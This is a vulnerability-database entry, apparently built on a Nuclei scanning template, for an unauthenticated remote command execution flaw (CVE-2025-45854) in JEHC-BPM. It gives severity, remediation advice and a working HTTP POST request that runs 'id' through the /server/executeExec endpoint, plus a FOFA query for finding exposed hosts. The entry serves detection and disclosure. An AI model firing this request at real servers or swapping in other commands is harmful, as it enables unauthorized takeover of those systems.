/Vulnerability Library

JEHC-BPM - Remote Code Execute

CVE-2025-45854
Verified

Description

A Remote Command Execution vulnerability in the component /server/executeExec of JEHC-BPM <= v2.0.1 allows attackers to execute arbitrary code. The vulnerability exists due to insufficient authorization checks in the executeExec endpoint which allows direct command execution.

Severity

Critical

CVSS Score

10

Exploit Probability

14%

Affected Product

jehc-bpm

Published Date

June 17, 2025

Template Author

ritikchaddha

CVE-2025-45854.yaml
id: CVE-2025-45854

info:
  name: JEHC-BPM - Remote Code Execute
  author: ritikchaddha
  severity: critical
  description: |
    A Remote Command Execution vulnerability in the component /server/executeExec of JEHC-BPM <= v2.0.1 allows attackers to execute arbitrary code. The vulnerability exists due to insufficient authorization checks in the executeExec endpoint which allows direct command execution.
  impact: |
    Unauthenticated attackers can execute arbitrary operating system commands through the /server/executeExec endpoint due to missing authorization checks, achieving complete server compromise.
  remediation: |
    Upgrade JEHC-BPM to a version later than 2.0.1 that implements proper authorization checks on the executeExec endpoint.
  reference:
    - https://gist.github.com/Cafe-Tea/bc14b38f4bfd951de2979a24c3358460
    - https://nvd.nist.gov/vuln/detail/CVE-2025-45854
  classification:
    epss-score: 0.1437
    epss-percentile: 0.94264
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-45854
    cwe-id: CWE-862,CWE-434
  metadata:
    max-request: 1
    product: jehc-bpm
    fofa-query: body="JEHC"
  tags: cve,cve2025,jehc-bpm,rce,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        words:
          - "JEHC"
          - "XSHI"
        case-insensitive: true
        internal: true

  - raw:
      - |
        POST /server/executeExec HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {
          "actuator": {
            "clientIp": "127.0.0.1",
            "port": 8082,
            "applicationName": "testApp",
            "env": "prod",
            "uploadTime": 1704523200000,
            "hasPrefixApplicationName": false,
            "clientHttpPrefix": "http"
          },
          "execParams": {
            "command": "id"
          }
        }

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f52c984ea67ae650619466a079ad3aeff57b6614b60185e36aa8ec84dff3a227022100f6f233a0fb6b50247885cd41f7893246ee793d96dc656f828a843570da34098d:922c64590222798bb761d5b6d8e72950
10.0Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID:
cve-2025-45854
CWE ID:
cwe-862, cwe-434

References

https://gist.github.com/Cafe-Tea/bc14b38f4bfd951de2979a24c3358460https://nvd.nist.gov/vuln/detail/CVE-2025-45854

Remediation Steps

Upgrade JEHC-BPM to a version later than 2.0.1 that implements proper authorization checks on the executeExec endpoint.